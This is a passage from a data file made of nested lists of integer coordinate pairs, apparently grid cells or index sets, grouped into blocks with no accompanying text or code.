3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 21],[ 12 , 24],[ 12 , 26],[ 12 , 28],[ 12 , 30],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 28],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 21],[ 9 , 24],[ 9 , 27],[ 9 , 28],[ 9 , 30],[ 9 , 33],[ 9 , 34],[ 9 , 36],[ 9 , 37],[ 9 , 39],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 21],[ 9 , 24],[ 9 , 27],[ 9 , 28],[ 9 , 30],[ 9 , 33],[ 9 , 34],[ 9 , 36],[ 9 , 37],[ 9 , 39],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 29],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 21],[ 14 , 24],[ 14 , 27],[ 14 , 28],[ 14 , 30],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 6 , 17],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 17],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 27],[ 7 , 28],[ 7 , 29],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 17],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 27],[ 8 , 28],[ 8 , 29],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 9 , 17],[ 9 , 21],[ 9 , 22],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 10 , 18],[ 10 , 21],[ 10 , 24],[ 10 , 25],[ 10 , 27],[ 10 , 30],[ 10 , 31],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 11 , 18],[ 11 , 21],[ 11 , 24],[ 11 , 25],[ 11 , 27],[ 11 , 30],[ 11 , 31],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 12 , 18],[ 12 , 21],[ 12 , 24],[ 12 , 25],[ 12 , 27],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 15 , 20],[ 15 , 23],[ 15 , 25],[ 15 , 26],[ 15 , 29],[ 15 , 31],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 36],[ 16 , 20],[ 16 , 23],[ 16 , 25],[ 16 , 26],[ 16 , 29],[ 16 , 31],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 36]],[ [1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 1 , 32],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 26],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 5 , 38],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 9 , 39],[ 9 , 40],[ 9 , 41],[ 10 , 23],[ 10 , 27],[ 10 , 28],[ 10 , 29],[ 10 , 33],[ 10 , 34],[ 10 , 35],[ 10 , 39],[ 10 , 40],[ 10 , 41],[ 11 , 23],[ 11 , 27],[ 11 , 28],[ 11 , 29],[ 11 , 33],[ 11 , 34],[ 11 , 35],[ 11 , 39],[ 11 , 40],[ 11 , 41],[ 12 , 24],[ 12 , 27],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 12 , 40],[ 12 , 42],[ 13 , 24],[ 13 , 27],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 13 , 40],[ 13 , 42],[ 14 , 24],[ 14 , 27],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 14 , 42],[ 15 , 24],[ 15 , 27],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 15 , 42],[ 16 , 25],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 16 , 41],[ 16 , 42],[ 17 , 25],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 17 , 41],[ 17 , 42],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 41],[ 18 , 42],[ 19 , 26],[ 19 , 29],[ 19 , 31],[ 19 , 32],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 40],[ 19 , 41],[ 19 , 42],[ 20 , 26],[ 20 , 29],[ 20 , 31],[ 20 , 32],[ 20 , 35],[ 20 , 37],[ 20 , 38],[ 20 , 40],[ 20 , 41],[ 20 , 42],[ 21 , 26],[ 21 , 29],[ 21 , 31],[ 21 , 32],[ 21 , 35],[ 21 , 37],[ 21 , 38],[ 21 , 40],[ 21 , 41],[ 21 , 42],[ 22 , 26],[ 22 , 29],[ 22 , 31],[ 22 , 32],[ 22 , 35],[ 22 , 37],[ 22 , 38],[ 22 , 40],[ 22 , 41],[ 22 , 42]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 2 , 33],[ 2 , 34],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 16],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 17],[ 8 , 20],[ 8 , 23],[ 8 , 24],[ 8 , 26],[ 8 , 29],[ 8 , 30],[ 8 , 32],[ 8 , 33],[ 8 , 35],[ 9 , 17],[ 9 , 20],[ 9 , 23],[ 9 , 24],[ 9 , 26],[ 9 , 29],[ 9 , 30],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 18],[ 11 , 21],[ 11 , 23],[ 11 , 25],[ 11 , 27],[ 11 , 29],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 12 , 18],[ 12 , 21],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 19],[ 7 , 23],[ 7 , 